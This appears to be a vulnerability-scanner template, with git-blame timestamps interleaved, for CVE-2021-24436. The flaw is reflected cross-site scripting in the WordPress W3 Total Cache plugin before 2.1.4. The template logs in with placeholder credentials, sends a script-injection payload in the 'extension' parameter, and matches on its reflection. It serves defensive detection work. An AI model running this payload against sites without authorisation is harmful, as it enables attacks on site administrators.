2023-03-18 22:07:09 +00:00
id : CVE-2021-24436
info :
2023-03-28 18:58:03 +00:00
name : WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting
2023-03-18 22:07:09 +00:00
author : theamanrawat
severity : medium
description : |
2023-03-28 20:48:28 +00:00
WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.
2023-09-06 12:09:01 +00:00
remediation : Fixed in version 2.1.4.
2023-03-18 22:07:09 +00:00
reference :
- https://wpscan.com/vulnerability/3e855e09-056f-45b5-89a9-d644b7d8c9d0
- https://wordpress.org/plugins/w3-total-cache/
2023-03-20 07:05:15 +00:00
- https://wpscan.com/vulnerability/05988ebb-7378-4a3a-9d2d-30f8f58fe9ef
2023-03-28 18:58:03 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24436
2023-03-18 22:07:09 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2021-24436
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.001
2023-10-19 10:38:59 +00:00
epss-percentile : 0.40817
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:*
2023-03-18 22:07:09 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : boldgrid
product : w3_total_cache
2023-09-06 12:09:01 +00:00
framework : wordpress
2023-03-18 22:07:09 +00:00
tags : cve,cve2021,xss,wpscan,wordpress,wp-plugin,wp,w3-total-cache,authenticated
2023-04-27 04:28:59 +00:00
http :
2023-03-18 22:07:09 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=w3tc_extensions&extension="%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
matchers :
- type : dsl
dsl :
- status_code_2 == 200
- contains(body_2, '><script>alert(document.domain)</script>&action=view')
2023-06-19 21:10:30 +00:00
- contains(header_2, "text/html")
2023-03-18 22:07:09 +00:00
condition : and